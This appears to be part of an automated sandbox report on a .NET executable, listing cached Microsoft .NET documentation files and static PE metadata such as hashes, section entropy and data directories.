                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):1154
                                                                                                                                                                                                                                          Entropy (8bit):4.59126408969148
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                                                                          MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                                                                          SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                                                                          SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                                                                          SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
                                                                                                                                                                                                                                          Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V

                                                                                                                                                                                                                                          Chrome Cache Entry: 186

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (33273), with no line terminators
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):33273
                                                                                                                                                                                                                                          Entropy (8bit):4.918756013698695
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUukj:5hOEO8chkMet7pCjBfcHkWOzUukj
                                                                                                                                                                                                                                          MD5:86E84C732A96BF9CF18C99B48DB90B6D
                                                                                                                                                                                                                                          SHA1:6A8C212067CB9FE5B8325AE1E89FCA3E7FCF20FA
                                                                                                                                                                                                                                          SHA-256:B54678C5BFB00DC1AFBF2E52C56F8E10173975C25FB19062EFE5DC86F1B7D769
                                                                                                                                                                                                                                          SHA-512:AD91A78371074B5BB2105A9AE69664371C235B7C82DFD25C9ED17F435E92018F2A0DD42203F403D7A75DF4FC63966017519F118B2B22F0DE7656B2B155636AA2
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                                                                                          Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre

                                                                                                                                                                                                                                          Chrome Cache Entry: 187

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):35005
                                                                                                                                                                                                                                          Entropy (8bit):7.980061050467981
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                                                                          MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                                                                          SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                                                                          SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                                                                          SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...

                                                                                                                                                                                                                                          Chrome Cache Entry: 188

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):13842
                                                                                                                                                                                                                                          Entropy (8bit):7.802399161550213
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                                                                          MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                                                                          SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                                                                          SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                                                                          SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...

                                                                                                                                                                                                                                          Chrome Cache Entry: 189

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):4897
                                                                                                                                                                                                                                          Entropy (8bit):4.8007377074457604
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                                                                          MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                                                                          SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                                                                          SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                                                                          SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]

                                                                                                                                                                                                                                          Chrome Cache Entry: 190

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):1817143
                                                                                                                                                                                                                                          Entropy (8bit):5.501007973622959
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                                                                          MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                                                                          SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                                                                          SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                                                                          SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/static/assets/0.4.029026183/scripts/en-us/index-docs.js
                                                                                                                                                                                                                                          Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(

                                                                                                                                                                                                                                          Chrome Cache Entry: 191

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                          Size (bytes):3130
                                                                                                                                                                                                                                          Entropy (8bit):4.790069981348324
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                                                                          MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                                                                          SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                                                                          SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                                                                          SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
                                                                                                                                                                                                                                          Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/

                                                                                                                                                                                                                                          Chrome Cache Entry: 192

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):18367
                                                                                                                                                                                                                                          Entropy (8bit):7.7772261735974215
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                                                                          MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                                                                          SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                                                                          SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                                                                          SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m

                                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Entropy (8bit):7.849370824950313
                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                          File name:iGhDjzEiDU.exe
                                                                                                                                                                                                                                          File size:983'040 bytes
                                                                                                                                                                                                                                          MD5:7caf240db905f259197cf71b03acf888
                                                                                                                                                                                                                                          SHA1:d8d9726a0a67795a01fed368055d9315feada3fd
                                                                                                                                                                                                                                          SHA256:c8017f526793dd8b6b6e98bfa9847fcf3aa7c4096a8432719a8324e06ba8c088
                                                                                                                                                                                                                                          SHA512:1f9464e14d33bfab44dfc85486bea31126a26929e04eae1159e6ecc886aa79877ca29aa93e614512625000d153e090c06b3b2081f9cbc1e8997ad26e59097255
                                                                                                                                                                                                                                          SSDEEP:24576:GzrpUdcKiEWIXZ4aQJkf1dedJNxkTeGnAoEe:cpKiEWIJ4aWkfjedxkTeGAo9
                                                                                                                                                                                                                                          TLSH:1E2512586B0AE103C95527B40E71F2B51A7D5DDEA911E3378FEC3EEBB826E106D44183
                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Qrg..............0......4........... ........@.. .......................`............`................................

                                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                                          Icon Hash:16bb2d4d6ccc6593

                                                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Entrypoint:0x4ee8c6
                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                          Time Stamp:0x677251C7 [Mon Dec 30 07:54:47 2024 UTC]
                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                          File Version Major:4
                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                                                                                          add byte ptr [eax], al

                                                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xee8740x4f.text
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xf00000x3190.rsrc
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xf40000xc.reloc
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                          Sections

                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                          .text0x20000xec8cc0xeca007f12c90f661e0fa256f09b40324836b5False0.9459707639989435data7.85185407933489IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                          .rsrc0xf00000x31900x320028abd9e935f7422da319fe74aa8ab824False0.94203125data7.778196284666235IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
